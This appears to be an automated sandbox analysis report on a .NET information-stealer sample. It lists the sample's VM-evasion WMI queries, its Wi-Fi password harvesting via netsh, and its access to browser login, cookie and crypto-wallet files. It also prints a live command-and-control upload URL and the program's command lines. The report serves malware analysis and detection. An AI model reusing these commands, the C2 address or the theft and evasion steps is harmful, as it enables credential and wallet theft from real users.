      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
      Source: 3K5MXGVOJE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: 3K5MXGVOJE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: 3K5MXGVOJE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ntkrnlmp.pdbxC4 source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbMZ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: Stealer.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Security.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: rnlmp.pdb\* source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000D12000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdataataa source: 3K5MXGVOJE.exe, 00000000.00000002.1071835301.000000000773E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.IO.Compression.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \C#\Arcana\Stealer\obj\Release\Stealer.pdb source: 3K5MXGVOJE.exe
      Source: Binary string: System.Configuration.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000712EB000.00000020.00000001.01000000.00000008.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.IO.Compression.pdbX$ source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Drawing.pdb source: 3K5MXGVOJE.exe, 00000000.00000002.1086311571.00000000714CB000.00000020.00000001.01000000.00000007.sdmp, WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdatata source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.00000000057BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Management.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: mscorlib.ni.pdbRSDS] source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.ni.pdb source: WER1843.tmp.dmp.18.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER1843.tmp.dmp.18.dr
      Source: 3K5MXGVOJE.exeStatic PE information: 0x95B6C1D8 [Thu Aug 5 13:19:20 2049 UTC]
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .Nw
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .T]1
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_051A1414 push eax; mov dword ptr [esp], ecx 0_2_051A1434
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_05A07A8C push esp; iretd 0_2_05A07A8D
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeCode function: 0_2_06C7949A push eax; ret 0_2_06C794A1
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .text entropy: 7.867046875219915
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .Nw entropy: 7.056379099711291
      Source: 3K5MXGVOJE.exeStatic PE information: section name: .T]1 entropy: 6.844845731566418

      Hooking and other Techniques for Hiding and Protection

      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 1489
      Source: unknownNetwork traffic detected: HTTP traffic on port 1489 -> 49712
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: 2B00000 memory reserve | memory write watch
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: 2C80000 memory reserve | memory write watch
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: 4C80000 memory reserve | memory write watch
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWindow / User API: threadDelayed 9910
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: 3K5MXGVOJE.exeBinary or memory string: IsVirtualMachine
      Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1059554645.0000000000D12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: 3K5MXGVOJE.exeBinary or memory string: <IsVirtualMachine>b__1_0
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: 3K5MXGVOJE.exe, Killer.csReference to suspicious API methods: OpenProcess(1u, (byte)bInheritHandle != 0, processId)
      Source: 3K5MXGVOJE.exe, ImportHider.csReference to suspicious API methods: LoadLibrary(dllName)
      Source: 3K5MXGVOJE.exe, ImportHider.csReference to suspicious API methods: GetProcAddress(intPtr, methodName)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Users\user\Desktop\3K5MXGVOJE.exe VolumeInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1068685690.000000000572B000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1071835301.0000000007780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: Amcache.hve.LOG1.18.dr, Amcache.hve.18.drBinary or memory string: MsMpEng.exe
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: r4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: r1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: r5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1076558748.00000000707CB000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: get_MachineKeyStore
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
      Source: Yara matchFile source: 00000000.00000002.1061396393.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 3K5MXGVOJE.exe PID: 4236, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts831
      Windows Management Instrumentation
      1
      Scripting
      1
      DLL Side-Loading
      111
      Disable or Modify Tools
      1
      OS Credential Dumping
      1
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API
      1
      DLL Side-Loading
      11
      Process Injection
      2
      Obfuscated Files or Information
      LSASS Memory134
      System Information Discovery
      Remote Desktop Protocol2
      Data from Local System
      1
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
      Software Packing
      Security Account Manager931
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      11
      Non-Standard Port
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Timestomp
      NTDS62
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Clipboard Data
      3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets3
      Process Discovery
      SSHKeylogging3
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts62
      Virtualization/Sandbox Evasion
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
      Process Injection
      DCSync1
      System Network Configuration Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Behavior Graph ID: 1568316, Sample: 3K5MXGVOJE.exe, Startdate: 04/12/2024, Architecture: WINDOWS, Score: 100
      Start
        DNS/IP: 90.168.9.0.in-addr.arpa; icanhazip.com
        Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Sigma detected: Capture Wi-Fi password; 5 other signatures
        started: 3K5MXGVOJE.exe (15 29)
          DNS/IP: 89.23.100.233, 1489, 49712 MAXITEL-ASRU Russian Federation; icanhazip.com 104.16.185.241, 49711, 80 CLOUDFLARENETUS United States
          Signatures: Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines); Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines); Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines); 11 other signatures
          started: cmd.exe (1)
            Signatures: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
            started: tasklist.exe (1); conhost.exe
          started: cmd.exe (1)
            started: netsh.exe (2); conhost.exe; findstr.exe (1); chcp.com (1)
          started: WerFault.exe (21 16)
            dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode
          started: cmd.exe (1)
            started: taskkill.exe (1); conhost.exe; 2 other processes

Source | Detection | Scanner | Label | Link
3K5MXGVOJE.exe | 100% | Avira | HEUR/AGEN.1309950 |
3K5MXGVOJE.exe | 50% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
3K5MXGVOJE.exe | 100% | Joe Sandbox ML | |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://89.23.100.233:1489 | 0% | Avira URL Cloud | safe |
http://89.23.100.233:1489/uploadt | 0% | Avira URL Cloud | safe |
http://beta.visualstudio.net/net/sdk/feedback.asp | 0% | Avira URL Cloud | safe |
http://89.23.100.233:1489/upload | 0% | Avira URL Cloud | safe |
http://upx.sf.net | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
icanhazip.com | 104.16.185.241 | true | false | | high
90.168.9.0.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://icanhazip.com/ | false | | high
http://89.23.100.233:1489/upload | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://beta.visualstudio.net/net/sdk/feedback.asp | 3K5MXGVOJE.exe, 00000000.00000002.1076558748.0000000070BD1000.00000020.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | tmpF56F.tmp.dat.0.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr | false | | high
https://duckduckgo.com/chrome_newtab | 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr | false | | high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search | 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr | false | | high
http://89.23.100.233:1489/uploadt | 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | tmpF56F.tmp.dat.0.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr | false | | high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D07000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E7C000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D62000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078AC000.00000004.00000020.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF572.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr | false | | high
http://89.23.100.233:1489 | 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D59000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmpF56F.tmp.dat.0.dr | false | | high
http://upx.sf.net | Amcache.hve.18.dr | false | Avira URL Cloud: safe | unknown
